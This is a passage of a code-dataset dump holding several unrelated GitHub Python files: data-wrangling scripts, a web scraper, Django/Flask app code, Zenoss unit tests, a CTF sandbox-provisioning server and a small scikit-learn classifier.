street_types[street_type].add(street_name)\r\n\r\ndef audit_state_name(state_names, state_name):\r\n if state_name != 'CA':\r\n state_names.append(state_name)\r\n\r\ndef audit_postcode(postcodes, postcode):\r\n m = postcode_re.search(postcode)\r\n if m:\r\n postcodes.append(postcode)\r\n\r\ndef audit_city_name(city_names, city_name):\r\n m = name_re.search(city_name)\r\n if m:\r\n city_names.append(city_name)\r\n\r\ndef is_street_name(elem):\r\n return (elem.attrib['k'] == \"addr:street\")\r\n\r\ndef is_postcode_name(elem):\r\n return (elem.attrib['k'] == \"addr:postcode\")\r\n\r\ndef is_state_name(elem):\r\n return (elem.attrib['k'] == \"addr:state\")\r\n\r\ndef is_city_name(elem):\r\n return (elem.attrib['k'] == \"addr:city\")\r\n\r\ndef audit(osmfile):\r\n \r\n osm_file = open(osmfile, \"r\")\r\n street_types = defaultdict(set)\r\n state_names = []\r\n postcodes = []\r\n city_names = []\r\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\r\n\r\n if elem.tag == \"node\" or elem.tag == \"way\":\r\n for tag in elem.iter(\"tag\"):\r\n # Audit street type\r\n if is_street_name(tag):\r\n audit_street_type(street_types, tag.attrib['v'])\r\n # Audit postcode\r\n if is_postcode_name(tag):\r\n audit_postcode(postcodes, tag.attrib['v'])\r\n # Audit state name\r\n if is_state_name(tag):\r\n audit_state_name(state_names, tag.attrib['v'])\r\n # Audit city name\r\n if is_city_name(tag):\r\n audit_city_name(city_names, tag.attrib['v'])\r\n\r\n return street_types, state_names, postcodes, city_names\r\n\r\n\r\ndef process_audit():\r\n street_types, state_names, postcodes, city_names = audit(OSMFILE)\r\n pprint.pprint(street_types)\r\n pprint.pprint(state_names)\r\n pprint.pprint(postcodes)\r\n pprint.pprint(city_names)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n process_audit()","repo_name":"Anumehra/Udacity","sub_path":"Data Wrangling Final Project/Code/auditing_data.py","file_name":"auditing_data.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25907410486","text":"#coding=utf-8\n'''\nCreated on 2016年6月27日\n\n@author: BFD_487\n'''\nimport urllib2\nimport json\n\ndef download():\n url = \"http://waimai.baidu.com/waimai/shoplist/7033186bfbbe1a70?sortby=distance&display=json&page=1&count=40\";\n request = urllib2.Request(url);\n request.add_header(\"Cookie\", '''wm_search_addr=[{\"name\":\"%E5%8C%97%E8%BE%B0%E4%B8%96%E7%BA%AA%E4%B8%AD%E5%BF%83A%E5%BA%A7\",\"address\":\"%E5%8C%97%E8%BE%B0%E8%A5%BF%E8%B7%AF8%E5%8F%B7%E9%99%A22%E5%8F%B7\",\"lat\":4839166.18,\"lng\":12957111.44,\"shopnum\":1081,\"city_id\":131}]''');\n response = urllib2.urlopen(request);\n responseJson = response.read();\n pagedata = json.loads(responseJson);\n shopinfo = pagedata[\"result\"][\"shop_info\"];\n \n shoplist = [];\n for shop in shopinfo:\n shopdata = {};\n# shop_name = shop[\"shop_name\"];\n shopdata[\"shop_name\"] = shop[\"shop_name\"];\n #起送价格\n# takeout_price = shop[\"takeout_price\"];\n shopdata[\"takeout_price\"] = shop[\"takeout_price\"];\n #配送时间\n# delivery_time = shop[\"delivery_time\"];\n shopdata[\"delivery_time\"] = shop[\"delivery_time\"];\n #平均得分\n# average_score = shop[\"average_score\"];\n shopdata[\"average_score\"] = shop[\"average_score\"];\n #月销量\n# saled_month = shop[\"saled_month\"];\n shopdata[\"saled_month\"] = shop[\"saled_month\"];\n #起送价格\n# takeout_cost = shop[\"takeout_cost\"];\n shopdata[\"takeout_cost\"] = shop[\"takeout_cost\"];\n \n welfarelist = [];\n for welfare in shop[\"welfare_info\"]:\n welfarelist.append(welfare[\"msg\"]);\n shopdata[\"welfare_info\"] = welfarelist;\n shoplist.append(shopdata);\n return json.dumps(shoplist)\n\nif __name__ == '__main__':\n file = open(\"shopinfo.data\", 'w')\n file.write(str(download()))","repo_name":"baifendian/Life_Big_Bang","sub_path":"hackcrawler/com/yue/baidutakeout/DownloadShopInfo.py","file_name":"DownloadShopInfo.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8232466766","text":"import sys\nimport ctypes as ct\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\nclass MemoryStruct(ct.Structure):\n _fields_ = [\n (\"memory\", ct.c_void_p),\n (\"size\", ct.c_size_t),\n]\n\ndef init_memory(chunk: MemoryStruct):\n chunk.memory = libc.malloc(1) # grown as needed with realloc\n chunk.size = 0 # no data at this point\n\n\n@lcurl.write_callback\ndef write_function(buffer, size, nitems, stream):\n chunk = ct.cast(stream, ct.POINTER(MemoryStruct)).contents\n buffer_size = size * nitems\n\n memory = libc.realloc(chunk.memory, chunk.size + buffer_size + 1)\n if not memory:\n # out of memory!\n print(\"not enough memory (realloc returned NULL)\")\n return 0\n\n chunk.memory = memory\n ct.memmove(chunk.memory + chunk.size, buffer, buffer_size)\n chunk.size += buffer_size\n ct.memset(chunk.memory + chunk.size, 0, 1)\n return buffer_size\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"https://www.example.org/\"\n\n chunk = MemoryStruct()\n init_memory(chunk)\n\n post_this = b\"Field=1&Field=2&Field=3\"\n\n lcurl.global_init(lcurl.CURL_GLOBAL_ALL)\n # init the curl session\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(True, curl):\n if not curl:\n libc.free(chunk.memory)\n return 1\n\n # specify URL\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n if defined(\"SKIP_PEER_VERIFICATION\"):\n lcurl.easy_setopt(curl, lcurl.CURLOPT_SSL_VERIFYPEER, 0)\n # send all data to this function \n lcurl.easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_function)\n # we pass our 'chunk' struct to the callback function\n lcurl.easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, ct.byref(chunk))\n # some servers do not like requests that are made without a user-agent\n # field, so we provide one\n lcurl.easy_setopt(curl, lcurl.CURLOPT_USERAGENT, b\"libcurl-agent/1.0\")\n lcurl.easy_setopt(curl, lcurl.CURLOPT_POSTFIELDS, post_this)\n # if we do not provide POSTFIELDSIZE, libcurl will len() by itself\n lcurl.easy_setopt(curl, lcurl.CURLOPT_POSTFIELDSIZE, len(post_this))\n\n # Perform the request, res will get the return code\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n else:\n # Now, our chunk.memory points to a memory block that is chunk.size\n # bytes big and contains the remote file.\n #\n # Do something nice with it!\n print(\"%s\" % ct.cast(chunk.memory, ct.c_char_p).value.decode(\"utf-8\"))\n\n # Cleanup\n libc.free(chunk.memory)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/postinmemory.py","file_name":"postinmemory.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"27916087224","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path(\"apply-loan\", views.apply_loan, name=\"apply_loan\"),\n path(\"request-to-repay-loan\", views.request_to_repay_loan, name=\"request_to_repay_loan\"), \n path(\"manual-repay-loan\", views.manual_repay_loan, name=\"repay_loan\"), \n path(\"view-loans/\", views.view_loans, name=\"view_loans\"), \n path(\"view-loan\", views.view_loan, name=\"view_loans\"), \n path(\"approve-loan\", views.approve_loan, name=\"approve_loan\"), \n path(\"close-loan\", views.close_loan, name=\"close loan\"), \n path(\"add-loan-security\", views.add_loan_security, name=\"add_loan_security\"), \n\n path(\"create-loan-product\", views.create_loan_product, name=\"create_loan_product\"),\n path(\"add-loan-product-charge\", views.add_loan_product_charge, name=\"add_loan_product_charge\"),\n path(\"set-unrealized-interest-wallet\", views.apply_loan, name=\"apply_loan\"),\n]\n","repo_name":"Taridi-Financial/cobanking","sub_path":"cbsaas/lending/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1844195713","text":"from flask import Blueprint, jsonify, request\nfrom database import db\n\nfrom models.Room import Room, RoomTypes\nfrom models.Image import Image\nfrom models.Reservation import Reservation, Status\nfrom models.User import User\nfrom models.Review import Review\nfrom models.Thread import Thread\nfrom models.Message import Message\n\nimport json\nimport random\nimport time\nfrom datetime import datetime, timedelta\nimport string\n\nreservations_blueprint = Blueprint('reservations', __name__)\n\n\n@reservations_blueprint.route(\"/rooms//reservations/unavailable_dates\", methods=['GET', 'POST'])\ndef unavailable_dates(room_id):\n if request.method == 'GET':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n reservations_dict = []\n for i in room.reservations:\n if i.status == Status.not_available:\n reservations_dict.append(i.to_dict())\n return jsonify(reservations_dict)\n elif request.method == 'POST':\n room = Room.query.filter_by(id=room_id).first()\n\n new_reservations = request.get_json()\n print(new_reservations)\n new_reservations = new_reservations['new_reservations']\n\n reservations = new_reservations['reservations']\n renter_public_id = new_reservations['public_user_id']\n renter = User.query.filter_by(public_id=renter_public_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n for r in room.reservations:\n db.session.delete(r)\n for a in reservations:\n d_from = datetime.strptime(a['date_from'], \"%Y-%m-%d\")\n if a['date_to'] is None:\n d_to = None\n else:\n d_to = datetime.strptime(a['date_to'], \"%Y-%m-%d\")\n\n room.reservations.append(Reservation(d_from, d_to, Status.not_available, renter.id))\n\n db.session.commit()\n return jsonify({'message': 'SUCCESS'})\n\n\n@reservations_blueprint.route(\"/rooms//reservations\", methods=['GET', 'PUT'])\ndef set_reservations(room_id):\n if request.method == 'GET':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n reservations_dict = []\n for i in room.reservations:\n reservations_dict.append(i.to_dict())\n return jsonify(reservations_dict)\n\n elif request.method == 'PUT':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n new_reservation = request.get_json()\n new_reservation = new_reservation['reservation']\n\n d_from = datetime.strptime(new_reservation['date_from'], \"%Y-%m-%d\")\n if new_reservation['date_to'] is None:\n d_to = None\n else:\n d_to = datetime.strptime(new_reservation['date_to'], \"%Y-%m-%d\")\n\n renter_public_id = new_reservation['public_user_id']\n renter = User.query.filter_by(public_id=renter_public_id).first()\n\n room.reservations.append(Reservation(d_from, d_to, Status.rented, renter.id))\n\n db.session.commit()\n return jsonify({'message': 'SUCCESS'})\n","repo_name":"giatrakosg/treehouse","sub_path":"backend/routes/Reservations.py","file_name":"Reservations.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5071211046","text":"from django import forms\nfrom django.core.mail import send_mail\nfrom django.forms.models import inlineformset_factory\n\nfrom profiles.models import Profile, GiftGroup, Invitation, Membership\n\nfrom pagedown.widgets import PagedownWidget\n\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = []\n\n\nclass ContactForm(forms.Form):\n subject = forms.CharField(max_length=100, required=False)\n message = forms.CharField(widget=forms.Textarea)\n\n def send_email(self, from_email, to_email):\n subject_prefix = '[ChrAppy] '\n subject = subject_prefix + self.cleaned_data['subject']\n message = self.cleaned_data['message']\n message += '\\n\\n(Please do not reply directly to this email - nobody will read it!)'\n\n send_mail(subject, message, from_email, [to_email])\n\n\nclass MembershipForm(forms.ModelForm):\n \"\"\"Membership form for before pairs have been assigned.\"\"\"\n avoid = forms.ModelMultipleChoiceField(\n queryset=None,\n required=False,\n widget=forms.CheckboxSelectMultiple,\n help_text=\"You may still be assigned a person who you've asked to avoid.\")\n prefer = forms.ModelMultipleChoiceField(\n queryset=None,\n required=False,\n widget=forms.CheckboxSelectMultiple,\n help_text=\"You might not be assigned any of the people who you've preferred.\")\n partner = forms.ModelChoiceField(queryset=None, required=False)\n wishlist = forms.CharField(widget=PagedownWidget())\n\n def __init__(self, *args, **kwargs):\n # Pop so __init__ doesn't recieve unexpected kwargs\n self.request = kwargs.pop('request')\n self.membership = kwargs.pop('membership')\n super(MembershipForm, self).__init__(*args, **kwargs)\n # Exclude current user from choice field querysets\n # and only include members of current group\n giftgroup = self.membership.giftgroup\n invitations = Invitation.objects.filter(\n gift_group=giftgroup).exclude(to_name=self.request.user.username)\n self.fields['avoid'].queryset = invitations\n self.fields['prefer'].queryset = invitations\n self.fields['partner'].queryset = invitations\n\n class Meta:\n model = Membership\n fields = ['wishlist', 'partner', 'avoid_partner', 'prefer', 'avoid']\n\n\nclass MembershipPairedForm(forms.ModelForm):\n \"\"\"Membership form for after pairs have been assigned.\"\"\"\n wishlist = forms.CharField(widget=PagedownWidget())\n\n def __init__(self, *args, **kwargs):\n # Pop so __init__ doesn't recieve unexpected kwargs\n self.request = kwargs.pop('request')\n self.membership = kwargs.pop('membership')\n super(MembershipPairedForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = Membership\n fields = ['wishlist']\n\n\nclass GroupForm(forms.ModelForm):\n class Meta:\n model = GiftGroup\n fields = ['name']\n\nInvitationFormSet = inlineformset_factory(\n GiftGroup, Invitation, fields=['to_name', 'to_email'])\n","repo_name":"dangerdak/chrapp","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17617728943","text":"import os, sys\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\n\nfrom zExceptions import Redirect\n\nfrom Products.ZenModel.Exceptions import *\nfrom Products.ZenModel.DeviceClass import *\nfrom Products.ZenModel.Device import Device\nfrom Products.Zuul import getFacade\nfrom ZenModelBaseTest import ZenModelBaseTest\n\nclass TestDeviceClass(ZenModelBaseTest):\n\n def afterSetUp(self):\n super(TestDeviceClass, self).afterSetUp()\n devices = self.dmd.Devices\n self.routers = devices.createOrganizer(\"/NetworkDevice/Router\")\n devices.createOrganizer(\"/NetworkDevice/Router/Firewall\")\n devices.createOrganizer(\"/NetworkDevice/Router/RSM\")\n devices.createOrganizer(\"/Server\")\n self.dev = self.dmd.Devices.createInstance(\"testdev\")\n self.dev2 = self.dmd.Devices.createInstance(\"testdev2\")\n self.dev3 = self.routers.createInstance(\"testrouter\")\n\n def testCreateInstanceDevice(self):\n devices = self.dmd.Devices\n self.assert_(isinstance(self.dev, Device))\n self.assertEqual(self.dev.deviceClass(), devices)\n self.assertEqual(self.dev.getDeviceClassName(), \"/\")\n self.assertEqual(devices.countDevices(), 3)\n self.assert_(self.dev in devices.getSubDevices())\n self.assertEqual(devices.getPythonDeviceClass(), Device)\n\n \n def testCreateInstanceDeviceAndIndex(self):\n devices = self.dmd.Devices\n self.assert_(isinstance(self.dev, Device))\n self.assertEqual(self.dev.deviceClass(), devices)\n self.assertEqual(self.dev.getDeviceClassName(), \"/\")\n\n\n def testSearchDevicesOneDevice(self):\n devices = self.dmd.Devices\n self.assertEqual( len( devices._findDevice(\"testdev2\") ), 1 )\n\n \n def testSearchDevicesNoDevice(self):\n devices = self.dmd.Devices\n self.assertEqual(len(devices._findDevice(\"adsf\")), 0)\n\n \n def testSearchDevicesMultipleDevices(self):\n devices = self.dmd.Devices\n self.assertEqual(len(devices._findDevice(\"testdev*\")), 2)\n\n def testSearchDevicesByTitle(self):\n self.dev2.setTitle('testtitle2')\n foundDevices = self.dmd.Devices._findDevice('testtitle2')\n self.assertEqual( len( foundDevices ), 1 )\n self.assertEqual( foundDevices[0].id, self.dev2.id )\n \n def testFindExact(self):\n id = 'testdev'\n devices = self.dmd.Devices\n devices.createInstance('TESTDEV')\n #inexact\n self.assertEqual(len(devices._findDevice(id)), 2)\n #exact\n\n dev = devices.findDeviceByIdExact(id)\n self.assertEqual( dev.id, id )\n \n self.assert_( not devices.findDeviceByIdExact(None) )\n self.assert_( not devices.findDeviceByIdExact('badid') )\n\n def test_FindDevices(self):\n devBrains = self.dmd.Devices._findDevice( 'testdev' )\n self.assertEqual( len( devBrains ), 1 )\n dev = devBrains[0].getObject()\n self.assertEqual( dev.id, 'testdev' )\n dev.setTitle('testdev2')\n devBrains = self.dmd.Devices._findDevice( 'testdev2' )\n self.assertEqual( len( devBrains ), 2 )\n self.assertEqual( devBrains[0].getObject().id, 'testdev2' )\n self.assertEqual( devBrains[1].getObject().id, 'testdev' )\n devBrains = self.dmd.Devices._findDevice( 'testdev2', False )\n self.assertEqual( len(devBrains), 1 )\n self.assertEqual( devBrains[0].getObject().id, 'testdev2' )\n devBrains = self.dmd.Devices._findDevice( 'badid' )\n self.assert_( not devBrains )\n\n def testFindDevice(self):\n dev = self.dmd.Devices.findDevice( 'testdev' )\n self.assertEqual( dev.id, 'testdev' )\n dev.setTitle('testdev2')\n dev = self.dmd.Devices.findDevice( 'testdev2' )\n self.assertEqual( dev.id, 'testdev2' )\n dev.setTitle( 'testtitle' )\n dev = self.dmd.Devices.findDevice( 'testtitle' )\n self.assertEqual( dev.id, 'testdev2' )\n dev = self.dmd.Devices.findDevice( 'badid' )\n self.assert_( dev is None )\n\n\n def testFindDeviceByIdOrIp(self):\n dev = self.dmd.Devices.findDeviceByIdOrIp( 'testdev' )\n self.assertEqual( dev.id, 'testdev' )\n dev.setManageIp( '1.1.1.1' )\n dev = self.dmd.Devices.findDeviceByIdOrIp( '1.1.1.1' )\n self.assertEqual( dev.id, 'testdev' )\n dev = self.dmd.Devices.findDeviceByIdOrIp( 'badid' )\n self.assert_( dev is None )\n\n def testGetPeerDeviceClassNames(self):\n dcnames = self.dev3.getPeerDeviceClassNames()\n self.assert_(\"/NetworkDevice/Router\" in dcnames)\n self.assert_(\"/NetworkDevice/Router/Firewall\" in dcnames)\n self.assert_(\"/NetworkDevice/Router/RSM\" in dcnames)\n\n self.routers.moveDevices('/','testrouter')\n self.assert_(self.dev3 in self.dmd.Devices.getSubDevices())\n self.assert_(self.dev3 not in \n self.dmd.Devices.NetworkDevice.Router.getSubDevices())\n \n\n def testZPythonClass(self):\n from Products.ZenModel.tests.CustDevice import CustDevice\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n self.assertEqual(CustDevice, \n self.dmd.Devices.CustDev.getPythonDeviceClass())\n\n def testMoveDevices(self):\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n dev = self.dmd.Devices.Server.devices.testdev\n self.assert_(dev.os.interfaces)\n\n def testMoveDevicesRetainsGuid(self):\n guid = IGlobalIdentifier(self.dev).getGUID()\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n newguid = IGlobalIdentifier(self.dmd.Devices.Server.devices.testdev).getGUID()\n self.assertEqual(guid, newguid)\n path = self.dmd.guid_table.get(newguid, None)\n self.assertEqual(path, '/zport/dmd/Devices/Server/devices/testdev')\n\n def testMoveDevicesRetainsProductionState(self):\n self.dev._setProductionState(99)\n self.dev.setPreMWProductionState(98)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n newProdState = self.dmd.Devices.Server.devices.testdev.getProductionState()\n newPreMWProdState = self.dmd.Devices.Server.devices.testdev.getPreMWProductionState()\n self.assertEqual(newProdState, 99)\n self.assertEqual(newPreMWProdState, 98)\n\n def testMoveDevicesRetainsComponentProductionState(self):\n self.dev._setProductionState(99)\n self.dev.setPreMWProductionState(98)\n self.dev.os.addIpInterface('eth0', True)\n component = self.dev.os.interfaces()[0]\n component._setProductionState(49)\n component.setPreMWProductionState(48)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n\n component = self.dmd.Devices.Server.devices.testdev.os.interfaces()[0]\n newProdState = component.getProductionState()\n newPreMWProdState = component.getPreMWProductionState()\n self.assertEqual(newProdState, 49)\n self.assertEqual(newPreMWProdState, 48)\n\n def testMoveDevicesRetainsComponentProductionStateAcquisition(self):\n self.dev._setProductionState(99)\n self.dev.os.addIpInterface('eth0', True)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n \n # Component production state is the same (acquired from device)\n component = self.dmd.Devices.Server.devices.testdev.os.interfaces()[0]\n newProdState = component.getProductionState()\n self.assertEqual(newProdState, 99)\n\n # Component production state still acquires from device\n self.dev._setProductionState(59)\n newProdState = component.getProductionState()\n self.assertEqual(newProdState, 59)\n\n def testMoveDevicesWithPotentialCaseIssue(self):\n self.dmd.Devices.createInstance( 'TESTDEV' )\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n dev = self.dmd.Devices.Server.devices.testdev\n self.assert_(dev.os.interfaces)\n\n def testMoveDevicesStandardToCust(self):\n anna = self.dmd.Locations.createOrganizer(\"Annapolis\")\n group = self.dmd.Groups.createOrganizer(\"TestGroup\")\n self.dev.setLocation(\"/Annapolis\")\n self.dev.setGroups(\"/TestGroup\")\n self.dev.rackSlot = 15\n from Products.ZenModel.tests.CustDevice import CustDevice\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n self.dmd.Devices.moveDevices('/CustDev', 'testdev') \n dev = self.dmd.Devices.findDevice('testdev')\n self.assertEqual(dev.getDeviceClassPath(), \"/CustDev\")\n self.assertEqual(dev.rackSlot, '15')\n self.assertEqual(dev.__class__, CustDevice)\n self.assertEqual(dev.location(), anna)\n self.assert_(dev in anna.devices())\n self.assert_(group in dev.groups())\n\n def testMoveDevicesCustToStandard(self):\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n cdev = self.dmd.Devices.CustDev.createInstance('cdev')\n anna = self.dmd.Locations.createOrganizer(\"Annapolis\")\n group = self.dmd.Groups.createOrganizer(\"TestGroup\")\n cdev.setLocation(\"/Annapolis\")\n cdev.setGroups(\"/TestGroup\")\n cdev.rackSlot = 15\n self.dmd.Devices.moveDevices(\"/\", 'cdev')\n dev = self.dmd.Devices.findDevice('cdev')\n self.assertEqual(dev.getDeviceClassPath(), \"/\")\n self.assertEqual(dev.rackSlot, '15')\n self.assertEqual(dev.__class__, Device)\n self.assertEqual(dev.location(), anna)\n self.assert_(group in dev.groups())\n \n def testOrganizer(self):\n devices = self.dmd.Devices\n dc = devices.createOrganizer('/Test')\n self.assert_(dc in devices.children())\n self.assert_(dc in devices.getSubOrganizers())\n self.assertEqual(devices.countChildren(), 6)\n self.assert_('Test' in devices.childIds())\n self.assert_('/Test' in devices.getOrganizerNames())\n self.assertEqual(devices.getOrganizer('/Test'), dc)\n layer = devices.createOrganizer('/Layer')\n devices.moveOrganizer('Layer',['Test'])\n self.assert_('/Layer' in devices.getOrganizerNames())\n self.assert_(dc not in devices.children())\n self.assert_(dc in devices.getSubOrganizers())\n getFacade('device', self.dmd).deleteNode('/zport/dmd/Devices/Layer')\n self.assert_(layer not in devices.children())\n self.assert_(dc not in devices.getSubOrganizers())\n\n def testDeviceOrganizer(self):\n devices = self.dmd.Devices\n dc = devices.createOrganizer('/Test')\n self.assertEqual(devices.countDevices(), 3)\n self.assert_(self.dev in devices.getSubDevices())\n\n def test_devtypes(self):\n devices = self.dmd.Devices\n # Test registration\n devices.register_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [('Device', 'SNMP')])\n # Test no duplicates\n devices.register_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [('Device', 'SNMP')])\n # Test removal\n devices.unregister_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [])\n \n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestDeviceClass))\n return suite\n\nif __name__==\"__main__\":\n framework()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/tests/testDeviceClass.py","file_name":"testDeviceClass.py","file_ext":"py","file_size_in_byte":11644,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"16316288115","text":"import pickle\nfrom pathlib import Path\n\nimport torch\n\nimport Resources.training as r\nfrom Pipeline import torch_datagenerator as td\nfrom Pipeline.data_gather import get_filelist_within_folder_blacklisted\nfrom Pipeline.data_loader_dryspot import DataloaderDryspots\n\nif __name__ == \"__main__\":\n dlds = DataloaderDryspots(divide_by_100k=False)\n batch_size = 131072\n generator = td.LoopingDataGenerator(\n r.get_data_paths_base_0(),\n get_filelist_within_folder_blacklisted,\n dlds.get_sensor_bool_dryspot,\n num_validation_samples=131072,\n num_test_samples=1048576,\n batch_size=batch_size,\n split_load_path=r.datasets_dryspots,\n split_save_path=Path(),\n num_workers=75,\n looping_strategy=None\n )\n all_sensor_inputs = []\n for i, (inputs, _, _) in enumerate(generator):\n all_sensor_inputs.append(inputs)\n print(i)\n all_sensor_values = torch.cat(all_sensor_inputs, dim=0)\n _std = all_sensor_values.std(dim=0)\n _mean = all_sensor_values.mean(dim=0)\n print(\"Std\\n\", _std)\n print(\"Mean\\n\", _mean)\n pickle.dump((_mean, _std), open(\"mean_std_1140_pressure_sensors.p\", \"wb\"))\n","repo_name":"isse-augsburg/rtm-predictions","sub_path":"Utils/calculate_mean_and_std_on_training_set_pressuresensors.py","file_name":"calculate_mean_and_std_on_training_set_pressuresensors.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"12275808587","text":"from flask import Flask\nfrom capitains_nautilus.flask_ext import FlaskNautilus\n\n\nfrom . import configurable\n\n\napp = Flask(\"app\")\n\n\nextension_nemo = configurable.nemo_class(\n base_url=\"\",\n resolver=configurable.resolver,\n templates={\n \"main\": configurable.templates_folder,\n \"additional\": configurable.templates_folder_additional\n },\n chunker={\n \"default\": configurable.chunker\n },\n transform=configurable.xslt_dict,\n static_folder=configurable.statics_folder\n)\nextension_nautilus = FlaskNautilus(\n prefix=\"/api\",\n resolver=configurable.resolver\n)\n\n\nextension_nautilus.init_app(app)\nextension_nemo.init_app(app)\n\nconfigurable.instantiate_errors(app, extension_nemo)\n","repo_name":"Capitains/nemo-template-app","sub_path":"nemo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"13001417186","text":"#!/usr/bin/env python3\nfrom pathlib import Path\nimport secrets\nimport asyncio\nimport subprocess\n\nfrom starlette.applications import Starlette\nfrom starlette.responses import HTMLResponse\nfrom starlette.background import BackgroundTask\n\nimport config\nimport powser\n\nserver = Starlette(debug=config.debug)\npowser = powser.Powser(db_path='./pow/pow.sqlite3', difficulty=config.difficulty)\n\nasync def remove_sandbox(sandbox_name):\n await asyncio.sleep(config.recycle_t)\n subprocess.run(['sudo', '/usr/bin/remove_sandbox.sh', sandbox_name])\n\ndef create_sandbox(sandbox_name):\n subprocess.run(['sudo', '/usr/bin/create_sandbox.sh', sandbox_name])\n\n@server.route('/')\nasync def index(request):\n ip = request.headers['X-Real-IP']\n answer = request.query_params.get('answer')\n if answer is None:\n prefix, time_remain = powser.get_challenge(ip)\n return HTMLResponse(f'''\n{prefix} {powser.difficulty}\n\nsha256({prefix} + ???) == {'0'*powser.difficulty}({powser.difficulty})...\n\n\n\nWe will create an isolated sandbox for challengers to prevent you from being interfered by others.\n\nIP: {ip}\nTime remain: {time_remain} seonds\nYou need to await {time_remain - powser.min_refresh_time} seconds to get a new challenge.\n'''.replace('\\n', ' \\n'))\n res, msg = powser.verify_client(ip, str(answer), with_msg=True)\n if not res:\n return HTMLResponse(msg)\n sandbox_name = secrets.token_urlsafe(32)[:32].replace('-', '_') # useradd will parse '-nabc' ... -_-\n create_sandbox(sandbox_name)\n return HTMLResponse(f'''\nYour sandbox is available in /{sandbox_name}/ \nIt's will be automatically deleted after {config.recycle_t} seconds.\n''', background=BackgroundTask(remove_sandbox, sandbox_name))\n","repo_name":"BookGin/my-ctf-challenges","sub_path":"balsn-ctf-2019/images-and-words/docker/zeus/sandbox_main.py","file_name":"sandbox_main.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"}
+{"seq_id":"6501997966","text":"from sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\n\niris = load_iris()\nx, y = iris.data, iris.target\n\nx_train, x_test, y_train, y_test = tts(x, y, test_size=0.2)\n\nc = 1\ngamma = 'auto'\nkernel = 'linear'\n\nmodel = SVC(kernel=kernel, C=c, gamma=gamma)\nmodel.fit(x_train, y_train)\n\ny_pred = model.predict(x_test)\nprint(confusion_matrix(y_pred, y_test))\nprint(accuracy_score(y_pred, y_test))\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Project/heart recognize/my classifier/example_prac.py","file_name":"example_prac.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
